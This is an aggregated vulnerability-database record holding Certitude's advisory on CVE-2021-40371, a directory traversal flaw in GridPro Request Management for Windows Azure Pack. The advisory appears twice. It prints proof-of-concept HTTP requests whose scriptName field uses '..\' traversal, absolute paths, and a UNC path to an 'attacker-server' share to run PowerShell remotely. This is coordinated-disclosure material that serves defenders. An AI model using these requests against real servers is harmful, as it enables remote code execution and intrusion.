GridPro Request Management for Windows Azure Pack versions 2.0.7905 and below suffer from a traversal vulnerability that can allow for arbitrary execution of Powershell scripts.
{"id": "1337DAY-ID-36951", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "GridPro Request Management For Windows Azure Pack 2.0.7905 Directory Traversal Vulnerability", "description": "GridPro Request Management for Windows Azure Pack versions 2.0.7905 and below suffer from a traversal vulnerability that can allow for arbitrary execution of Powershell scripts.", "published": "2021-10-26T00:00:00", "modified": "2021-10-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/36951", "reporter": "Giulian Guran", "references": [], "cvelist": ["CVE-2021-40371"], "immutableFields": [], "lastseen": "2021-12-04T15:48:55", "viewCount": 150, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0870"]}, {"type": "cve", "idList": ["CVE-2021-40371"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164621"]}], "rev": 4}, "score": {"value": 5.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", 
"idList": ["CPAI-2021-0870"]}, {"type": "cve", "idList": ["CVE-2021-40371"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164621"]}]}, "exploitation": null, "vulnersScore": 5.3}, "sourceHref": "https://0day.today/exploit/36951", "sourceData": "~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~\n PRODUCT : GridPro Request Management for Windows Azure Pack\n VENDOR : GridPro Software\n SEVERITY : Critical\n AFFECTED VERSION : <=2.0.7905\n IDENTIFIERS : CVE-2021-40371\n PATCH VERSION : 2.0.7912\n FOUND BY : Giulian Guran, Certitude Lab\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nIntroduction\n------------\n\n\"Windows Azure Pack delivers cloud capabilities to \\[...\\] on-premise\ndatacenter\\[s\\]. \\[GridPro Request Management for Azure Pack\\] add\\[s\\]\nbusiness processes, custom services, and customer support by integrating\nMicrosoft System Center Service Manager(TM) with Windows Azure Pack in a\nunified cloud platform.\"\n\nSource: https://www.gridprosoftware.com/products/requestmanagement/\n\nVulnerability Overview\n----------------------\n\nGridPro Request Management for Windows Azure Pack provides the ability to\nexecute PowerShell scripts. Through specific JSON parameters in HTTP requests\nthe plugin takes relative path locations as input to execute the desired\nPowerShell scripts on the server. Through multiple techniques however, it is\npossible to reach PowerShell scripts in other directories that may not be\nintended to be executed by the application and can therefore lead to remote\ncode execution.\n\n1. Through directory traversal attacks (e.g. usage of one or more `..\\`) it\n is possible to reach parent directories outside the original web directory\n and execute arbitrary local scripts the web server account has access to.\n2. Through fully qualified path names (e.g. 
`C:\\Temp\\script.ps1`) it is\n possible to execute arbitrary local scripts the web server account has\n access to, when the full path to the script is known.\n3. By using UNC paths (e.g. `\\\\attacker-server\\share$\\script.ps1`) it is\n possible to execute arbitrary PowerShell scripts from attacker-controlled\n remote network shares.\n\nProof of Concept\n----------------\n\nTypical HTTP requests that execute PowerShell scripts on the server may look\nas follows. It is important to note that adding a second backslash is\nnecessary to properly escape the backslash character:\n\n POST /ServiceManagerTenant/GetVisibilityMap HTTP/2\n Host: [vulnerableHost]\n [...]\n Connection: close\n\n {\"scriptName\":\"Directory1\\\\Directory2\\\\OriginalScript.ps1\",[...]\n\nBy default, this relative path lies under the configured web server directory.\nThe possible attack types to gain access to PowerShell scripts in other\ndirectories or shares are described in the following sections.\n\n### 1. Directory Traversal\n\nUsing a directory traversal, it is possible to e.g. execute a local script\n`C:\\Temp\\script.ps1`:\n\n POST /ServiceManagerTenant/GetVisibilityMap HTTP/2\n Host: [vulnerableHost]\n [...]\n Connection: close\n\n {\"scriptName\":\"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Temp\\\\script.ps1\",[...]\n\nAn attacker can exploit this by writing or uploading arbitrary PowerShell\nscripts to the server and guessing their storage location to gain remote code\nexecution or by abusing existing PowerShell scripts on the server.\n\n### 2. Direct Access Using The Fully Qualified Path Name\n\nUsing the fully qualified path name, it is again possible to e.g. 
execute the\nlocal script `C:\\Temp\\script.ps1`:\n\n POST /ServiceManagerTenant/GetVisibilityMap HTTP/2\n Host: [vulnerableHost]\n [...]\n Connection: close\n\n {\"scriptName\":\"C:\\\\Temp\\\\script.ps1\",[...]\n\nAn attacker can exploit this by writing or uploading arbitrary PowerShell\nscripts to the server and knowing their exact storage location to gain remote\ncode execution or by abusing existing PowerShell scripts on the server.\n\n### 3. Execution Of Attacker-Controlled Scripts From Network Shares\n\nUsing UNC paths, it is possible to e.g. execute arbitrary scripts from\nattacker-controlled network shares:\n\n POST /ServiceManagerTenant/GetVisibilityMap HTTP/2\n Host: [vulnerableHost]\n [...]\n Connection: close\n\n {\"scriptName\":\"\\\\\\\\attacker-server\\\\share$\\\\script.ps1\",[...]\n\nAn attacker can exploit this by preparing arbitrary PowerShell scripts on an\nattacker-controlled network share and get them executed on the target server\nto gain remote code execution.\n\nResolution\n----------\n\nGridPro fixed this vulnerability in GridPro Request Management for Windows\nAzure Pack version 2.0.7912 and later.\n\nTimeline\n--------\n\n ---------------------------------------------------------------------------\n Date Text\n ------------ --------------------------------------------------------------\n 2021-08-04 Sending vulnerability description and proof of concept to the\n vendor\n\n 2021-08-17 GridPro team confirms issue being reproduced, fixed and\n validated on their side\n\n 2021-08-18 GridPro team confirms a customer having installed the fix\n\n 2021-08-19 Coordination with vendor\n\n 2021-08-20 Coordination with vendor\n\n 2021-08-25 Coordination with vendor\n\n 2021-08-31 Coordination with vendor\n\n 2021-09-06 Vendor releases patch\n\n 2021-10-19 Coordination with vendor\n\n 2021-10-20 Public release of the advisory\n ---------------------------------------------------------------------------\n", "category": "web applications", "verified": 
true, "_state": {"dependencies": 1646364059}}
{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:08", "description": "A remote code execution vulnerability exists in Gridpro Request Management. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-28T00:00:00", "type": "checkpoint_advisories", "title": "Gridpro Request Management Remote Code Execution (CVE-2021-40371)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40371"], "modified": "2021-11-28T00:00:00", "id": "CPAI-2021-0870", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-10-25T17:34:14", "description": "", "cvss3": {}, "published": "2021-10-25T00:00:00", "type": "packetstorm", "title": "GridPro Request Management For Windows Azure Pack 2.0.7905 Directory Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-40371"], "modified": "2021-10-25T00:00:00", "id": "PACKETSTORM:164621", "href": 
"https://packetstormsecurity.com/files/164621/GridPro-Request-Management-For-Windows-Azure-Pack-2.0.7905-Directory-Traversal.html", "sourceData": "`~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n~ Certitude Security Advisory - CSA-2021-003 ~ \n~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ \nPRODUCT : GridPro Request Management for Windows Azure Pack \nVENDOR : GridPro Software \nSEVERITY : Critical \nAFFECTED VERSION : <=2.0.7905 \nIDENTIFIERS : CVE-2021-40371 \nPATCH VERSION : 2.0.7912 \nFOUND BY : Giulian Guran, Certitude Lab \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nIntroduction \n------------ \n \n\"Windows Azure Pack delivers cloud capabilities to \\[...\\] on-premise \ndatacenter\\[s\\]. \\[GridPro Request Management for Azure Pack\\] add\\[s\\] \nbusiness processes, custom services, and customer support by integrating \nMicrosoft System Center Service Manager(TM) with Windows Azure Pack in a \nunified cloud platform.\" \n \nSource: https://www.gridprosoftware.com/products/requestmanagement/ \n \nVulnerability Overview \n---------------------- \n \nGridPro Request Management for Windows Azure Pack provides the ability to \nexecute PowerShell scripts. Through specific JSON parameters in HTTP requests \nthe plugin takes relative path locations as input to execute the desired \nPowerShell scripts on the server. Through multiple techniques however, it is \npossible to reach PowerShell scripts in other directories that may not be \nintended to be executed by the application and can therefore lead to remote \ncode execution. \n \n1. Through directory traversal attacks (e.g. usage of one or more `..\\`) it \nis possible to reach parent directories outside the original web directory \nand execute arbitrary local scripts the web server account has access to. \n2. Through fully qualified path names (e.g. 
`C:\\Temp\\script.ps1`) it is \npossible to execute arbitrary local scripts the web server account has \naccess to, when the full path to the script is known. \n3. By using UNC paths (e.g. `\\\\attacker-server\\share$\\script.ps1`) it is \npossible to execute arbitrary PowerShell scripts from attacker-controlled \nremote network shares. \n \nProof of Concept \n---------------- \n \nTypical HTTP requests that execute PowerShell scripts on the server may look \nas follows. It is important to note that adding a second backslash is \nnecessary to properly escape the backslash character: \n \nPOST /ServiceManagerTenant/GetVisibilityMap HTTP/2 \nHost: [vulnerableHost] \n[...] \nConnection: close \n \n{\"scriptName\":\"Directory1\\\\Directory2\\\\OriginalScript.ps1\",[...] \n \nBy default, this relative path lies under the configured web server directory. \nThe possible attack types to gain access to PowerShell scripts in other \ndirectories or shares are described in the following sections. \n \n### 1. Directory Traversal \n \nUsing a directory traversal, it is possible to e.g. execute a local script \n`C:\\Temp\\script.ps1`: \n \nPOST /ServiceManagerTenant/GetVisibilityMap HTTP/2 \nHost: [vulnerableHost] \n[...] \nConnection: close \n \n{\"scriptName\":\"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Temp\\\\script.ps1\",[...] \n \nAn attacker can exploit this by writing or uploading arbitrary PowerShell \nscripts to the server and guessing their storage location to gain remote code \nexecution or by abusing existing PowerShell scripts on the server. \n \n### 2. Direct Access Using The Fully Qualified Path Name \n \nUsing the fully qualified path name, it is again possible to e.g. execute the \nlocal script `C:\\Temp\\script.ps1`: \n \nPOST /ServiceManagerTenant/GetVisibilityMap HTTP/2 \nHost: [vulnerableHost] \n[...] \nConnection: close \n \n{\"scriptName\":\"C:\\\\Temp\\\\script.ps1\",[...] 
\n \nAn attacker can exploit this by writing or uploading arbitrary PowerShell \nscripts to the server and knowing their exact storage location to gain remote \ncode execution or by abusing existing PowerShell scripts on the server. \n \n### 3. Execution Of Attacker-Controlled Scripts From Network Shares \n \nUsing UNC paths, it is possible to e.g. execute arbitrary scripts from \nattacker-controlled network shares: \n \nPOST /ServiceManagerTenant/GetVisibilityMap HTTP/2 \nHost: [vulnerableHost] \n[...] \nConnection: close \n \n{\"scriptName\":\"\\\\\\\\attacker-server\\\\share$\\\\script.ps1\",[...] \n \nAn attacker can exploit this by preparing arbitrary PowerShell scripts on an \nattacker-controlled network share and get them executed on the target server \nto gain remote code execution. \n \nResolution \n---------- \n \nGridPro fixed this vulnerability in GridPro Request Management for Windows \nAzure Pack version 2.0.7912 and later. \n \nTimeline \n-------- \n \n--------------------------------------------------------------------------- \nDate Text \n------------ -------------------------------------------------------------- \n2021-08-04 Sending vulnerability description and proof of concept to the \nvendor \n \n2021-08-17 GridPro team confirms issue being reproduced, fixed and \nvalidated on their side \n \n2021-08-18 GridPro team confirms a customer having installed the fix \n \n2021-08-19 Coordination with vendor \n \n2021-08-20 Coordination with vendor \n \n2021-08-25 Coordination with vendor \n \n2021-08-31 Coordination with vendor \n \n2021-09-06 Vendor releases patch \n \n2021-10-19 Coordination with vendor \n \n2021-10-20 Public release of the advisory \n--------------------------------------------------------------------------- \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n(c) 2021 Certitude Consulting GmbH \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \n \n`\n", "sourceHref": 
"https://packetstormsecurity.com/files/download/164621/CSA-2021-003.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T19:08:34", "description": "Gridpro Request Management for Windows Azure Pack before 2.0.7912 allows Directory Traversal for remote code execution, as demonstrated by ..\\\\ in a scriptName JSON value to ServiceManagerTenant/GetVisibilityMap.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T07:15:00", "type": "cve", "title": "CVE-2021-40371", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40371"], "modified": "2021-10-28T22:18:00", "cpe": [], "id": "CVE-2021-40371", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40371", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}]}